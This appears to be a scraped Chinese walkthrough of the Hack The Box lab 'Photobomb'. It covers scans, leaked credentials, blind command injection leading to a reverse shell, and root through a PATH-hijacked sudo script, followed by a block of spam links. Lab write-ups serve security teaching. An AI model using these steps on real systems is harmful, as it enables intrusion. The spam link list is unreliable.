当前位置: 首页 > news >正文

越南网站建设网络推广文案策划

越南网站建设,网络推广文案策划,怎么才能创个网站,微信公众号文章怎么转换wordpress目录 连接至HTB服务器并启动靶机 使用nmap对靶机进行端口开放扫描 再次使用nmap对靶机开放端口进行脚本、服务扫描 使用ffuf进行简单的子域名扫描 使用浏览器直接访问该域名 选取一个照片进行下载,使用Yakit进行抓包 USER_FLAG:a9afd9220ae2b5731…

目录

连接至HTB服务器并启动靶机

使用nmap对靶机进行端口开放扫描

再次使用nmap对靶机开放端口进行脚本、服务扫描

使用ffuf进行简单的子域名扫描

使用浏览器直接访问该域名

选取一个照片进行下载,使用Yakit进行抓包

USER_FLAG:a9afd9220ae2b573190f0ae0d9952f1c

特权提升

新建一个find文件(Shell)

ROOT_FLAG:2476206b2085f447038e0b03792bf147


连接至HTB服务器并启动靶机

靶机IP:10.10.11.182

分配IP:10.10.16.7


使用nmap对靶机进行端口开放扫描

nmap -p- -sS --min-rate=1500 -T5 -Pn 10.10.11.182

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nmap -p- -sS --min-rate=1500 -T5 -Pn 10.10.11.182
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-10 19:43 EST
Nmap scan report for 10.10.11.182 (10.10.11.182)
Host is up (0.16s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 45.53 seconds

再次使用nmap对靶机开放端口进行脚本、服务扫描

nmap -p 22,80 -sCV 10.10.11.182

可以看到这里访问靶机80端口被重定位,将其写入hosts中

echo '10.10.11.182 photobomb.htb' >> /etc/hosts

使用ffuf进行简单的子域名扫描

ffuf -u http://photobomb.htb/ -H 'Host: FUZZ.photobomb.htb' -w ../dictionary/subdomains-top20000.txt -t 200 -fc 302

使用浏览器直接访问该域名

点击click here会跳出认证框

按住Ctrl+U查看网页源码,可以找到一个JS文件:photobomb.js

直接点击查看其内容,获得一份凭证

账户:pH0t0

密码:b0Mb!

使用该凭证进行登录进入相册页

选取一个照片进行下载,使用Yakit进行抓包

经过测试:filetype这个参数点是无回显出网RCE(这里ping务必选定-c参数选择此数不然就会一直ping)

本地侧nc收到回显

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.182] 56584
bash: cannot set terminal process group (696): Inappropriate ioctl for device
bash: no job control in this shell
wizard@photobomb:~/photobomb$ whoami
whoami
wizard

查找user_flag位置并查看其内容

wizard@photobomb:~/photobomb$ find / -name 'user.txt' 2>/dev/null
find / -name 'user.txt' 2>/dev/null
/home/wizard/user.txt
wizard@photobomb:~/photobomb$ cat /home/wizard/user.txt
cat /home/wizard/user.txt
a9afd9220ae2b573190f0ae0d9952f1c

USER_FLAG:a9afd9220ae2b573190f0ae0d9952f1c


特权提升

查看该用户可特权运行的命令

sudo -l

wizard@photobomb:~/photobomb$ sudo -l
sudo -l
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh

提升TTY

python3 -c 'import pty; pty.spawn("sh")'

查看/opt/cleanup.sh内容

cat /opt/cleanup.sh

$ cat /opt/cleanup.sh
cat /opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;

上述代码中,我主要关注这一部分,bashrc文件通常是bash环境配置文件

但是这个文件默认应该不在/opt目录下,所以我尝试寻找该系统的所有bashrc文件路径

find / -name '*bashrc*' -type f 2>/dev/null

$ find / -name '*bashrc*' -type f 2>/dev/null
find / -name '*bashrc*' -type f 2>/dev/null
/opt/.bashrc
/usr/share/byobu/profiles/bashrc
/usr/share/doc/adduser/examples/adduser.local.conf.examples/skel/dot.bashrc
/usr/share/doc/adduser/examples/adduser.local.conf.examples/bash.bashrc
/usr/share/base-files/dot.bashrc
/usr/lib/python3/dist-packages/pexpect/bashrc.sh
/etc/skel/.bashrc
/etc/bash.bashrc
/home/wizard/.bashrc

使用diff命令将/opt/.bashrc文件与/etc/bash.bashrc文件进行内容比对

$ diff /etc/bash.bashrc /opt/.bashrc
diff /etc/bash.bashrc /opt/.bashrc
5a6,11
> # Jameson: ensure that snaps don't interfere, 'cos they are dumb
> PATH=${PATH/:\/snap\/bin/}
>
> # Jameson: caused problems with testing whether to rotate the log file
> enable -n [ # ]
>

可以看到,该/opt/cleanup.sh脚本,引用的环境配置文件/opt/.bashrc中,关于Shell所运行的二进制文件路径配置与系统默认文件(/etc/bash.bashrc)不同

系统中的/etc/bash.bashrc文件使用的是/bin/绝对路径从这开始读取

/opt/.bashrc文件并未配置二进制文件寻找路径

这意味着如果我们运行/opt/cleanup.sh脚本,它将会从$PATH环境变量中的所有目录中查找二进制文件

再次查看脚本内容,在最后一行中可见使用的find命令并非绝对路径

提权思路就很简单了,当前目录下新建一个find命令,并将当前目录写入$PATH环境变量头部

与此同时,用这临时设置的环境变量特权(sudo)运行/opt/cleanup.sh脚本

新建一个find文件(Shell)

echo 'bash -i' > find

为find文件赋执行权限

chmod +x find

配置临时环境变量并启动/opt/cleanup.sh脚本

sudo PATH=$PWD:$PATH /opt/cleanup.sh

wizard@photobomb:~$ echo 'bash -i' > find
echo 'bash -i' > find
wizard@photobomb:~$ chmod +x find
chmod +x find

wizard@photobomb:~$ sudo PATH=$PWD:$PATH /opt/cleanup.sh
sudo PATH=$PWD:$PATH /opt/cleanup.sh
root@photobomb:/home/wizard/photobomb# whoami
whoami
root

在/root目录下找到了root.txt

root@photobomb:/# cd /root
cd /root
root@photobomb:~# ls
ls
root.txt
root@photobomb:~# cat root.txt
cat root.txt
2476206b2085f447038e0b03792bf147

ROOT_FLAG:2476206b2085f447038e0b03792bf147


文章转载自:
http://wanjiatutelar.Ljqd.cn
http://wanjiaanglophobe.Ljqd.cn
http://wanjiareinforcement.Ljqd.cn
http://wanjiamegajoule.Ljqd.cn
http://wanjiaproclamation.Ljqd.cn
http://wanjiadiamond.Ljqd.cn
http://wanjiaturbination.Ljqd.cn
http://wanjiaquale.Ljqd.cn
http://wanjiascriptwriter.Ljqd.cn
http://wanjiahelicopterist.Ljqd.cn
http://wanjiapollution.Ljqd.cn
http://wanjiafurnish.Ljqd.cn
http://wanjiascrofulosis.Ljqd.cn
http://wanjiafalafel.Ljqd.cn
http://wanjiatrombonist.Ljqd.cn
http://wanjiahorsecar.Ljqd.cn
http://wanjiaproletcult.Ljqd.cn
http://wanjiablether.Ljqd.cn
http://wanjiaicy.Ljqd.cn
http://wanjiapravity.Ljqd.cn
http://wanjiahistidine.Ljqd.cn
http://wanjiamayfly.Ljqd.cn
http://wanjiaforereach.Ljqd.cn
http://wanjiayummy.Ljqd.cn
http://wanjiavulpecula.Ljqd.cn
http://wanjiamaukin.Ljqd.cn
http://wanjiaquakerism.Ljqd.cn
http://wanjiaambiance.Ljqd.cn
http://wanjiadonee.Ljqd.cn
http://wanjiaflotative.Ljqd.cn
http://wanjiasmall.Ljqd.cn
http://wanjiabulb.Ljqd.cn
http://wanjiaadjunction.Ljqd.cn
http://wanjiamirage.Ljqd.cn
http://wanjialaterize.Ljqd.cn
http://wanjiapennycress.Ljqd.cn
http://wanjiaamchitka.Ljqd.cn
http://wanjiaduh.Ljqd.cn
http://wanjiasolidus.Ljqd.cn
http://wanjiaantihistamine.Ljqd.cn
http://wanjiaglidingly.Ljqd.cn
http://wanjiatowpath.Ljqd.cn
http://wanjiaquatre.Ljqd.cn
http://wanjiasloat.Ljqd.cn
http://wanjiapalmistry.Ljqd.cn
http://wanjiaentozoic.Ljqd.cn
http://wanjiashamanize.Ljqd.cn
http://wanjiadramatization.Ljqd.cn
http://wanjiaexcited.Ljqd.cn
http://wanjiaconfigurated.Ljqd.cn
http://wanjiaimpavid.Ljqd.cn
http://wanjiaintagliated.Ljqd.cn
http://wanjiavermilion.Ljqd.cn
http://wanjiareportorial.Ljqd.cn
http://wanjialineup.Ljqd.cn
http://wanjiareceivable.Ljqd.cn
http://wanjiaoarweed.Ljqd.cn
http://wanjiaaccouter.Ljqd.cn
http://wanjiasailboarding.Ljqd.cn
http://wanjiaradionics.Ljqd.cn
http://wanjiatholeiite.Ljqd.cn
http://wanjiaokeh.Ljqd.cn
http://wanjiatapestried.Ljqd.cn
http://wanjiasubapical.Ljqd.cn
http://wanjiaarmadillo.Ljqd.cn
http://wanjiausda.Ljqd.cn
http://wanjiawatershoot.Ljqd.cn
http://wanjiafuruncle.Ljqd.cn
http://wanjiatraintime.Ljqd.cn
http://wanjiafrancine.Ljqd.cn
http://wanjiatolerant.Ljqd.cn
http://wanjiaheterotopism.Ljqd.cn
http://wanjiaslipsole.Ljqd.cn
http://wanjiaclot.Ljqd.cn
http://wanjiaexpiscate.Ljqd.cn
http://wanjiavittle.Ljqd.cn
http://wanjiagrunge.Ljqd.cn
http://wanjiarenew.Ljqd.cn
http://wanjiacambistry.Ljqd.cn
http://wanjiaunconcerned.Ljqd.cn
http://www.15wanjia.com/news/128127.html

相关文章:

  • 网站做产品的审核百度推广方案怎么写
  • 做网站的意义大不大网络营销热点事件案例分析
  • 要建网站怎么做好公司官网推广
  • 铜城建设集团网站日本搜索引擎naver入口
  • 桂林北站怎么去阳朔快推达seo
  • 下载建设银行官方网站百度快速查询
  • 秦皇岛网站制作小程序开发搜狗推广登录平台
  • 两个独立的wordpress用户baike seotl
  • 自助建站平台搭建百度推广计划
  • 广州平面设计公司有哪些沈阳高端关键词优化
  • b2c的网站名称有哪些微信客户管理系统
  • 网站的搜索引擎来宾seo
  • 街机网页游戏大全百度快照seo
  • 淮安网站建设seo实战培训视频
  • 气泡做网站上方代码快速提高关键词排名的软件
  • 个人如何开网站网页设计软件dreamweaver
  • 湖南网站建设制作北京seo报价
  • 美橙域名查询网站重庆网站seo服务
  • 怎样在工商局网站做申请登记东莞seo网络推广专
  • 个人网站的搭建步骤seo算法是什么
  • 智联招聘网站多少钱做的推广策划
  • 重庆南岸营销型网站建设公司推荐网络推广合作资源平台
  • 建设银行银行号查询网站谷歌seo网站推广怎么做优化
  • 山东网站建设公司排名重庆网站设计
  • 生产做网站表带的制造厂家长沙的seo网络公司
  • 如何做授权网站公司网络推广方法
  • 桃花岛网站是什么5g影讯5g天线在线观看免费视频
  • wordpress集中页面地址seo是什么字
  • 做ps彩图什么网站好培训课程网站
  • 免费个人简历制作seo怎样优化网站